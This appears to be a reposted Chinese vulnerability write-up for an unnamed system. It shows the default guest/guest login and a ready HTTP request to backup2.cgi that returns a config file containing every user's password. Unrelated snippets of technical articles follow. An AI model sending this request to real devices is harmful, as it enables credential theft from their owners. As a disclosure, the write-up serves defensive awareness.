某系统存在任意账户凭据窃取漏洞

embedded/2024/11/14 0:51:20/

世人都晓神仙好,惟有功名忘不了!古今将相今何在?荒冢一堆草没了。

漏洞描述

某系统存在任意账户凭据窃取漏洞,攻击者使用任意账号登录后访问特殊的Url即可获取所有用户的账号和密码

漏洞复现

登录后台(存在访客用户默认账号密码 guest/guest)

漏洞存在于 backup2.cgi 文件中,运行后将会读取 /tmp/hdconfig/cli.conf 配置文件

访问漏洞url:

http://x.x.x/backup2.cgi           

请求包如下

GET /backup2.cgi HTTP/1.1
Host: x.x.x
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

漏洞证明,其中配置文件中是含有所有用户密码以及敏感配置信息的

在这里插入图片描述

漏洞验证poc:

漏洞证明:

在这里插入图片描述

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN: 现有1200+关注。
https://rdyx0.blog.csdn.net/公众号:儒道易行,现有10000+关注。
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社区:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

http://www.ppmy.cn/embedded/98632.html

相关文章

MySQL 中使用CTE获取时间段数据的技巧

在数据库操作中,获取特定时间段的数据是一项常见任务。MySQL自从8.0版本开始支持CTE(公共表表达式),使得我们可以更加灵活和高效地处理时间段数据。本文将介绍如何使用CTE获取最近十二个月、最近十二周、最近四个季度,…

DR模式 LVS负载均衡集群

目录 一、LVS—DR概述 1、数据包流向分析 2、DR 模式的特点 二、LVS—DR中遇到的ARP问题 三、DR模式 LVS负载均衡群集部署 1、配置负载调度器(172.16.88.11) 1.1、配置虚拟IP地址(VIP: 172.16.88.180) 1.2、调整内核参数 …

php源码编译与初始化

1 php源码编译 解压 yum install -y bzip2 # 安装解压工具 tar -xf php-7.4.12.tar.bz2 # 解压文件./condigure ./configure --prefix/usr/local/php --with-config-file-path/usr/local/php/etc --enable-fpm --with-fpm-usernginx --with-fpm-groupnginx --with-curl --wi…

网络编程第三天

服务器&#xff1a; #include<sys/types.h> // 支持套接字地址结构 #include <sys/socket.h> // 提供套接字API #include <netinet/in.h> // 定义IP地址结构体 #include <string.h> // 提供字符串操作函数 #include <stdio.h> // 提供标准I/O操…

Java学习笔记(01)抽象类与抽象方法

abstract修饰抽象类 此类称为抽象类抽象类不能实例化抽象类是包含构造器的&#xff0c;因为子类对象实例化时&#xff0c;需要直接或间接的调用到父类的构造器。抽象类中可以没有抽象方法&#xff0c;反之&#xff0c;抽象方法所在的类&#xff0c;一定是抽象类。 abstract修…

一起学习LeetCode热题100道(47/100)

47.从前序与中序遍历序列构造二叉树(学习) 给定两个整数数组 preorder 和 inorder &#xff0c;其中 preorder 是二叉树的先序遍历&#xff0c; inorder 是同一棵树的中序遍历&#xff0c;请构造二叉树并返回其根节点。 示例 1: 输入: preorder [3,9,20,15,7], inorder [9…

qt使用menu

思路&#xff1a;实例化一个QMenu的对象&#xff0c;然后通过函数addAction添加里面的子项。然后重写鼠标事件&#xff0c;比如当双击鼠标的时候&#xff0c;调用实例化对象的exec()函数&#xff0c;exec函数内传入重写的鼠标事件的全局坐标&#xff0c;就可以在鼠标点击的位置…

鹭鹰优化算法SBOA优化RBF神经网络的扩散速度实现多数入多输出数据预测,可以更改数据集(MATLAB代码)

一、鹭鹰优化算法介绍 鹭鹰优化算法&#xff08;Secretary Bird Optimization Algorithm, SBOA&#xff09;是一种新型的元启发式算法&#xff0c;它于2024年4月由Youfa Fu等人提出&#xff0c;并发表在SCI人工智能二区顶刊《Artificial Intelligence Review》上。该算法的灵感…